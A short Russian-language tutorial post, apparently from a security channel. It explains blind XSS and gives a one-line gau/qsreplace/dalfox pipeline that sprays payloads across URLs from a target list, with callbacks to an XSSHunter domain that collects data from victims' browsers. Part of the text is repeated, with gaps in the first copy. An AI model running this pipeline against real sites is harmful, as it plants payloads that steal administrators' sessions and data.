🖇 Находим Blind XSS на сайте одной командой
В качестве дополнения к этому посту стоит упомянуть про слепой XSS. Слепой XSS (Blind XSS) - это тип хранимых XSS, в котором ввод злоумышленников сохраняется в базе данных и отражается в совершенно другом месте или приложении, используемом системным администратором/членом команды.
Таким образом, злоумышленник слепо разворачивает серию вредоносных полезных нагрузок на веб-страницах, не зная никаких подробностей о полезных нагрузках, где они хранятся в базе данных или на какой веб-странице они выполняются.
Есть несколько фреймворков, созданных специально для Blind XSS. Мы будем использовать XSSHunter. Необходимо пройти регистрацию и получить специальный короткий домен
Мы будем использовать уже знакомые подписчикам канала инструменты, а именно gau - для получения URL адресов, qsreplace - для подстановки полезной нагрузки, а также dalfox для эксплуатации. Вместо
P.S. Не забывайте, что это только пример. При желании, вы можете расширить его как вам угодно, например, использовать совместно с gau и другие инструменты, тем самым получив больше конечных точек для эксплуатации.
#web #xss
В качестве дополнения к этому посту стоит упомянуть про слепой XSS. Слепой XSS (Blind XSS) - это тип хранимых XSS, в котором ввод злоумышленников сохраняется в базе данных и отражается в совершенно другом месте или приложении, используемом системным администратором/членом команды.
Таким образом, злоумышленник слепо разворачивает серию вредоносных полезных нагрузок на веб-страницах, не зная никаких подробностей о полезных нагрузках, где они хранятся в базе данных или на какой веб-странице они выполняются.
Есть несколько фреймворков, созданных специально для Blind XSS. Мы будем использовать XSSHunter. Необходимо пройти регистрацию и получить специальный короткий домен
xss.ht
, такой как shadow.xss.ht
. Этот домен будет встраиваться в полезную нагрузку и в случае успеха, на сайте будет отображаться информация о сработавшей слепой XSS. Мы будем использовать уже знакомые подписчикам канала инструменты, а именно gau - для получения URL адресов, qsreplace - для подстановки полезной нагрузки, а также dalfox для эксплуатации. Вместо
shadow.xss.ht
используйте свою ссылку.
cat target_list| gau | egrep -o "http?.*" | grep "="| egrep -v ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | dalfox pipe --blind shadow.xss.ht -o result.txt
P.S. Не забывайте, что это только пример. При желании, вы можете расширить его как вам угодно, например, использовать совместно с gau и другие инструменты, тем самым получив больше конечных точек для эксплуатации.
#web #xss